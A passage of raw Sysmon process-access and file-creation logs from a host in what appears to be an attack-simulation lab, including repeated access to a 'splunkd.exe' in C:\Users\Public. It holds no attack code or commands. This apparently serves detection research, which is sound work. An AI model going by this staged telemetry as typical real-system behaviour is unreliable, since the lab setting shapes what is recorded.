(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.013","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.044\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C7-5F25-0000-001053BE1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.044","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C7-5F25-0000-001053BE1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C7-5F25-0000-001053BE1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C7-5F25-0000-001053BE1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C7-5F25-0000-001053BE1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C7-5F25-0000-001053BE1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.232\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010697D1000}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.232","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010697D1000}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.232\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010697D1000}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.232","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010697D1000}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:35.247\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C7-5F25-0000-001023C21100}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:35.247","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C7-5F25-0000-001023C21100}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:36.013\r\nProcessGuid: {E2A3D6B1-13C7-5F25-0000-001023C21100}\r\nProcessId: 3284\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\cd4-0\\System.Web.Services.dll\r\nCreationUtcTime: 2020-08-01 07:03:36.013","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:36.013","ProcessGuid":"{E2A3D6B1-13C7-5F25-0000-001023C21100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\cd4-0\\System.Web.Services.dll","CreationUtcTime":"2020-08-01 07:03:36.013","EventReceivedTime":"2020-08-01 07:03:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:36.029\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:36.029","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files 